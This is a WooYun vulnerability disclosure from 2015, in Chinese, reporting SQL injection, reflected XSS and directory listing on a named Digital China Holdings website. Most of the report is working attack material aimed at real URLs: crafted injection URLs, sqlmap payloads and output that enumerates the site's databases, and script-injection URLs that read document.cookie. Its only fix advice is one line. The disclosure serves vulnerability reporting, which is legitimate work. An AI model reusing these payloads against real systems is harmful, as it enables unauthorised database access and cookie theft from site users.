当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0113114

漏洞标题:神州数码某站存在注入+反射xss+遍历目录漏洞

相关厂商:digitalchina.com

漏洞作者: 路人甲

提交时间:2015-05-20 16:58

修复时间:2015-05-25 17:00

公开时间:2015-05-25 17:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-20: 细节已通知厂商并且等待厂商处理中
2015-05-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

神州数码某站存在注入+反射xss+遍历目录
Digital China Holdings Limited. | Leading Sm@rt City in China

详细说明:

Digital China Holdings Limited. Leading Sm@rt City in China
http://www.digitalchina.com.hk/html/index.php

31.jpg


0X1
首先我们先看能注入的页面先
http://www.digitalchina.com.hk/html/product_details.php
http://www.digitalchina.com.hk/html/ir_circular.php
http://www.digitalchina.com.hk/html/ir_announce.php
http://www.digitalchina.com.hk/html/about_mgt_details.php
http://www.digitalchina.com.hk/c/about_mgt_details.php
http://www.digitalchina.com.hk/c/ir_announce.php
http://www.digitalchina.com.hk/c/ir_results.php
http://www.digitalchina.com.hk/c/news_newsletter.php
注入的页面还有,就不罗列出来了!
我们随便拿一个来测试先
http://www.digitalchina.com.hk/html/product_details.php?menuid1=(select(0)from(select(sleep(0)))v)/*'%2b(select(0)from(select(sleep(0)))v)%2b'%22%2b(select(0)from(select(sleep(0)))v)%2b%22*/&menuid2=8&menuid3=33&menuid4=14
http://www.digitalchina.com.hk/c/product_details.php?id=1%20and%201=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
为了方便我们接下来用sqlmap吧

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=8084' AND 8084=8084 AND 'kGUX'='kGUX
    Type: UNION query
    Title: MySQL UNION query (NULL) - 22 columns
    Payload: id=8084' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716d666a71,0x704545706c554662506e,0x7173727071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=8084' AND SLEEP(5) AND 'pscF'='pscF


32.jpg


[15:12:27] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[15:12:27] [INFO] retrieved: 54
[15:12:39] [INFO] retrieved: information_schema
[15:15:16] [INFO] retrieved: aas
[15:18:06] [INFO] retrieved: bboard
[15:19:42] [INFO] retrieved: bboard2
[15:21:06] [INFO] retrieved: bboard2_20101231
[15:24:46] [INFO] retrieved: chinastarch1
[15:28:00] [INFO] retrieved: cks
[15:29:26] [INFO] retrieved: cks_new
[15:31:27] [INFO] retrieved: community
[15:32:54] [INFO] retrieved: community_20101231
[15:35:09] [INFO] retrieved: doubleindex
[15:37:01] [INFO] retrieved: ginsengnatural
[15:39:12] [INFO] retrieved: glkg
[15:39:51] [INFO] retrieved: hds
[15:40:16] [INFO] retrieved: hds_2009
[15:41:36] [INFO] retrieved: jiuhao
[15:42:44] [INFO] retrieved: kotocms003
[15:44:18] [INFO] retrieved: kotoportal003
[15:46:34] [INFO] retrieved: l_xingyec


sqlmap "url" --current-db 我们还可以查到用户名

33.png


漏洞证明:

0X2
反射型XXS
http://www.digitalchina.com.hk/c/about_mgt_details.php
?id=12094'%22()%26%25<acx><ScRiPt%20>alert(document.cookie);</ScRiPt>

34.jpg


http://www.digitalchina.com.hk/html/ir_announce.php?year=2005'%22()%26%25<acx><ScRiPt%20>alert(document.cookie);</ScRiPt>
http://www.digitalchina.com.hk/html/ir_bod_details.php?id=176481'%22()%26%25<acx><ScRiPt%20>alert(document.cookie);</ScRiPt>
http://www.digitalchina.com.hk/c/news_corporate.php?year=2011'%22()%26%25<acx><ScRiPt%20>alert(document.cookie);</ScRiPt>
......
0X3 遍历目录
http://www.digitalchina.com.hk/manual/

35.jpg


36.jpg


修复方案:

过滤注入点!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-05-25 17:00

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无